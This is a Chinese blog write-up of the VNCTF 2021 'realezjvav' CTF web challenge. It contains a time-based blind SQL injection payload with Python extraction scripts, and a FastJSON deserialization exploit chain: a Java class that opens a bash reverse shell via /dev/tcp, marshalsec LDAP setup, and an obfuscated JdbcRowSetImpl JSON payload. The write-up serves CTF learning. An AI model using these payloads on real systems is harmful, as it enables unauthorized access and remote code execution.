[VNCTF 2021]realezjvav 复现

最新推荐文章于 2024-04-12 09:17:00 发布
原创 最新推荐文章于 2024-04-12 09:17:00 发布 · 969 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种在Spring Boot应用中通过SQL盲注获取密码的方法,并演示了如何利用FastJSON的反序列化漏洞实现远程代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
发现是springboot框架写的
测试sql注入
发现注入点在password这里
在这里插入图片描述
典型的盲注
发现不能布尔盲注,试试时间盲注
在这里插入图片描述
发现有过滤

在这里插入图片描述
为1714的都是被过滤的
盲注的两个sleep和benchmark都被过滤了
搜一波
在这里插入图片描述
绕过讲解
发现能用那个笛卡尔积绕过
payload

-1'/**/or/**/(if(ascii(substr(password,{},1))={},(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,information_schema.columns/**/B,information_schema.tables/**/C),1))#"

因为这个payload的超时时间非常不稳定,所以不要用timeout(之前在这里被坑了~~)
在这里插入图片描述

import string
import requests
import time


#二分法
def sqlinjet(url,payload):
    header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
    }
    flag=''
    for i in range(1,100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while(low < high):
            data = {
                'username': "admin",
                'password': payload.format(i, mid),
            }
            # requests.post(url=url, headers=header,data=data,timeout=1,proxies={'http':'http://127.0.0.1:8080'})
            begin =time.time()
            r= requests.post(url=url,data=data,headers=header)
            print(data['password'])
            end=time.time()
            if end - begin > 1:
               low = mid + 1
            else:
               high = mid
            mid = (low + high) // 2
        flag += chr(mid)
        print(flag)

url='http://fe734edc-3942-4189-a56a-dd08e5d27510.node3.buuoj.cn/user/login'
#查所有的库
payload_password="a' or (if(ascii(substr(password,{},1))>{},(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,information_schema.columns/**/B,information_schema.tables/**/C),1))#"

sqlinjet(url,payload_password)


#遍历
def sqlinjet(url,payload):
    header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
    }
    flag=''
    for i in range(1,128):
        for j in string.printable:
            data = {
                'username': "admin",
                'password': payload.format(i,ord(j)),
            }
            begin=time.time()
            r = requests.post(url=url, headers=header,data=data)
            print(data['password'])
            end = time.time()
            if end - begin > 1:
                flag += j
                break
            else:
                continue
        print(flag)
        time.sleep(0.6)

url='http://5f85ee3f-4030-476a-9979-30914bbb7da5.node3.buuoj.cn/user/login'

payload_password="-1'/**/or/**/(if(ascii(substr(password,{},1))={},(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,information_schema.columns/**/B,information_schema.tables/**/C),1))#"

sqlinjet(url,payload_password)

密码为:admin/no_0ne_kn0w_th1s

抓包发现他传的是个json
在这里插入图片描述
发现一个任意文件读取
在这里插入图片描述

之前接触过spring的东西,知道pom.xml里面存放了外部依赖
在这里插入图片描述
在这里插入图片描述
发现有个fastjson,找漏洞
fastjson漏洞
修改下Exploit.java

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ip/port 0>&1"});
        }catch(Exception e){ 
            e.printStackTrace();
        }   
    }   
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }   
}

先编译Exploit.java 生成class文件
再用python在class目录下起个服务

python3 -m http.server --bind 0.0.0.0 8888

最后开启远程方法调用rmi服务
rmi服务工具
maven构建项目

mvn clean package -DskipTests

准备LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ip:port/#Exploit" 1389

根据上面那个github https://github.com/CaijiOrz/fastjson-1.2.47-RCE

再用idap进行RCE,这里有绕过,用传统json绕过unicode编码绕过或者用hex绕过即可

{"name":{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class","val":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","dataSourceName":"ldap://ip:port/Exploit","\u0061\u0075\u0074\u006f\u0043\u006f\u006d\u006d\u0069\u0074":true}}}

nc 监听即可

在这里插入图片描述

[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
qq_51577576的博客
09-12 2018
[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
2021VNCTF realezjvav复现
读万卷书,行万里路。
05-16 516
文章目录1.1 基于运行时的报错注入1.2 FastJson反序列化 hint: 不会有web手电脑里没IDA吧,不会吧不会吧 仔细阅读package.json哦/汪汪 1.1 基于运行时的报错注入 尝试进行SQL注入,有关键字过滤。union、sleep、benchmark、rlike都被过滤了。 猜测为有过滤的字符型注入,尝试使用其他方法进行盲注,或者尝试进行报错注入。优先考虑报错注入。使用name_const方法可以可以导致报错。payload为: # 正常 ' or (1) or ' ' or
VNCTF2021 realezjvav复现(fastjson漏洞利用)
midi
03-16 2306
VNCTF2021 realezjvav复现 漏洞点: sql注入 fastjson漏洞(学到了学到了ORZ) 参考 官方wp 红队武器库:fastjson小于1.2.68全漏洞RCE利用exp bfengj师傅 复现过程 根据页面提示(Only the admin can get the right page) 以及源码,提示是sql注入,确定了用户名为admin,密码用test’ 报错500 用test’ # 正常200,fuzz下以及看师傅们的wp,知道要用笛卡儿积盲注 payload1: impo
VNCTF2021[WEB]
Y4tacker的博客
03-18 3829
文章目录前言Ez_gamenaiverealezjvavEasy_laravel 前言 这次比赛题目质量很好,本菜鸡做出了两道web题目,还是比较开心,只是赛后复现laravel一天半也没有成功,我好自闭啊 Ez_game 在game.js里面发现,直接放到console里面跑,得到flag ["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6
fastjson反序列化漏洞区分版本号的方法总结
yggcwhat
07-16 3533
fastjson反序列化漏洞区分版本号的方法总结
单容水箱液位随动系统的模糊控制研究(基于期刊《化工与自动化仪表》2021复现论文)》.pdf
03-21
单容水箱液位随动系统的模糊控制研究(基于期刊《化工与自动化仪表》2021复现论文)》.pdf
CISCN 2021 题目复现
树木常青的博客
05-21 1730
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
NahamConCTF-2021
03-15
NahamConCTF-2021
[西湖论剑 2022]real_ez_node 复盘
arcuied
01-11 692
半年前说要学node 到现在还是b动静没有。
[西湖论剑 2022]real_ez_node
rev1ve的博客
11-11 747
存在 Unicode 字符损坏导致的 HTTP 拆分攻击,(Node.js10中被修复),当 Node.js 使用 http.get (关键函数)向特定路径发出HTTP 请求时,发出的请求实际上被定向到了不一样的路径,这是因为NodeJS 中 Unicode 字符损坏导致的 HTTP 拆分攻击。补充说明:CRLF指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a)时,path被分成两部分,props数组如下。
西湖论剑 2023 比赛复现
shinygod的博客
02-11 1506
在copy 路由会检验 ip 地址是否为 127.0.0.1,且请求体不能有__proto__。在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测,然后利用constructor.prototype 替代__proto__,最后打ejs就行了。
三流安全工程师的渗透测试记录_ u0040 u0074 u0079 u0070 u0065
2401_83621136的博客
04-12 3376
返回为成功,使用abc#123456确实登录成功。然而这并不意味着,无论何时,直接发送重置密码的数据包都能成功的,这里能成功,是因为手机验证码一般都会有个有效时间,大概发送验证码后的十分钟内,直接发送重置密码的包是能重置成功的。十分钟后虽然返回也是成功,但是登录不上。给的修复建议是:1.后端校验验证码是否正确;2.去掉单独校验验证码的数据包,将验证码与修改后的密码在同一数据包中发送给后端,后端校验验证码正确后直接修改密码,不二次发包。
西湖论剑 2022复现
weixin_63231007的博客
03-03 1617
[西湖论剑 2022] Node Magical Login & [西湖论剑 2022] real_ez_node & [西湖论剑 2022] 扭转乾坤 & [西湖论剑 2022] unusual php
VNCTF2021 MISC wp
七月的博客
03-15 2130
冰冰好像藏着秘密
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 4105
2023西湖论剑初赛CTF部分wp
DASCTF NOV&&EzNode2的两种解法
v2ish1yan的博客
01-14 410
EzNode2的两种解法
CVE-2021-22145 复现
最新发布
03-31
好的,我现在需要帮助用户复现CVE-2021-22145漏洞。首先,我需要了解这个漏洞的基本信息。CVE-2021-22145是一个关于Elasticsearch的漏洞,具体来说,是Elasticsearch在日志记录中存在不正确的输入处理,可能导致权限...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值